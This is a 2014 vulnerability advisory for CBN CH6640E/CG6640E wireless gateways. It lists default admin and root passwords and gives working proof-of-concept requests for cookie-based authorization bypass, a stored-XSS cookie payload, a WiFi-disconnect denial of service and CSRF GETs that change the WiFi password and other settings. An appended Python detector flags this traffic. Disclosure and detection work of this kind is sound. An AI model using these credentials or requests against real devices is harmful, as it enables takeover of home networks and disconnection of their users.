
CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities

2014-10-25 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 10 High (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE

AI Score: 6.8 Medium (Confidence: Low)
EPSS: 0.045 Low (Percentile: 92.5%)

Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Advisory ID: ZSL-2014-5203
Type: Local/Remote
Impact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS
Risk: (3/5)
Release Date: 25.10.2014

Summary

The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.

Description

The CBN modem gateway suffers from multiple vulnerabilities including authorization bypass, information disclosure, stored XSS, CSRF and denial of service.

Vendor

Compal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>

Affected Version

Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0

Tested On

Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7

Vendor Status

N/A

PoC

cbn_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://cxsecurity.com/issue/WLB-2014100162>
[2] <http://www.exploit-db.com/exploits/35075/>
[3] <http://osvdb.org/show/osvdb/113836>
[4] <http://osvdb.org/show/osvdb/113837>
[5] <http://osvdb.org/show/osvdb/113838>
[6] <http://osvdb.org/show/osvdb/113839>
[7] <http://osvdb.org/show/osvdb/113840>
[8] <http://osvdb.org/show/osvdb/113841>
[9] <http://osvdb.org/show/osvdb/113842>
[10] <http://osvdb.org/show/osvdb/113843>
[11] <http://packetstormsecurity.com/files/128860>
[12] <http://www.securityfocus.com/bid/70762>
[13] <http://xforce.iss.net/xforce/xfdb/98328>
[14] <http://xforce.iss.net/xforce/xfdb/98329>
[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653>
[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654>
[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655>
[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656>
[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657>
[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653>
[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654>
[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655>
[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656>
[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>

Changelog

[25.10.2014] - Initial release
[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12]
[30.10.2014] - Added reference [13] and [14]
[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities


Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
                  Hardware version: 1.0
                  Firmware version: CH6640-3.5.11.7-NOSH
                  Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
                  DOCSIS mode: DOCSIS 3.0


Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.

Default credentials:

admin/admin - Allows access to the gateway pages
root/compalbn - Allows access to the gateway and provisioning pages and
                provides more configuration information.

Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass, information disclosure, stored XSS, CSRF and denial of
service.

Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php


04.10.2014

---



Authorization Bypass Information Disclosure Vulnerability
#########################################################

http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml

Setting the userData cookie to root or admin reveals additional pages/info.

--

<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>


--


Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################

GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1


Stored Cross-Site Scripting (XSS) Vulnerability
###############################################

Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>

--


<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>


--


Cross-Site Request Forgery (CSRF) Vulnerability
###############################################

DDNS config:
------------

GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1


Change wifi pass:
-----------------

GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1


Add static mac address (static assigned dhcp client):
-----------------------------------------------------

GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1


Enable/Disable UPnP:
--------------------

GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
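The issue classes above (cookie-only authorization, stored XSS through the userData cookie, state-changing GETs usable for CSRF, the WiFi disconnect page) can be flagged in gateway access traffic. This is an added detection example, not code from the advisory or the vendor; the gateway address and page names are taken from the advisory, while the request dict format, the Referer-based origin heuristic and the sample traffic (including the attacker.invalid placeholder) are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs
GATEWAY = "192.168.0.1"  # LAN address used throughout the advisory
EXPOSED_PAGES = {  # readable by anyone who sets userData=root/admin (advisory)
    "/xml/CmgwWirelessSecurity.xml", "/xml/DocsisConfigFile.xml",
    "/xml/CmgwBasicSetup.xml", "/basicDDNS.html", "/basicLanUsers.html",
}
# State-changing pages the advisory shows accepting a bare GET (CSRF), mapped
# to the query parameter whose presence means the request changes settings
STATE_CHANGING = {
    "/basicDDNS.html": "DdnsService",
    "/setWirelessSecurity.html": "psKey",
    "/setBasicDHCP1.html": "action",
    "/setAdvancedOptions.html": "UPnP",
}
DOS_PAGE = "/wirelessChannelStatus.html"  # one GET disconnects every WiFi client

def same_origin(referer):
    """True when the Referer header points back at the gateway's own UI."""
    return referer is not None and urlsplit(referer).hostname == GATEWAY

def classify(req):
    """Tag one request (dict: method, url, cookies, referer) with the advisory's
    issue classes. Heuristic: referer-less or cross-site hits count as foreign."""
    parts = urlsplit(req["url"])
    path, qs = parts.path, parse_qs(parts.query)
    user = req["cookies"].get("userData", "")
    foreign = not same_origin(req.get("referer"))
    findings = []
    if any(c in user for c in '<>"\''):       # stored XSS via the cookie value
        findings.append("xss-cookie")
    if path in EXPOSED_PAGES and user in ("root", "admin") and foreign:
        findings.append("authz-bypass")       # cookie value is the only "auth"
    if req["method"] == "GET" and STATE_CHANGING.get(path) in qs and foreign:
        findings.append("csrf")               # settings changed by a plain GET
    if path == DOS_PAGE and foreign:
        findings.append("wifi-dos")
    return findings

# Constructed sample traffic (not real logs); attacker.invalid is a placeholder
SAMPLE = [
    {"method": "GET", "url": "http://192.168.0.1/xml/DocsisConfigFile.xml",
     "cookies": {"userData": "root"}, "referer": None},
    {"method": "GET", "url": "http://192.168.0.1/setWirelessSecurity.html?Ssid=0&psKey=x",
     "cookies": {}, "referer": "http://attacker.invalid/"},
    {"method": "GET", "url": "http://192.168.0.1/basicLanUsers.html", "referer":
     "http://192.168.0.1/index.html", "cookies": {"userData": 'hax0r"><script>alert(1)</script>'}},
    {"method": "GET", "url": "http://192.168.0.1/wirelessChannelStatus.html",
     "cookies": {"userData": "admin"}, "referer": "http://192.168.0.1/wireless.html"},
]
```

A same-origin request to the DoS page is left unflagged because the gateway's own UI also loads it; the Referer heuristic is only a triage aid, not proof of intent.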
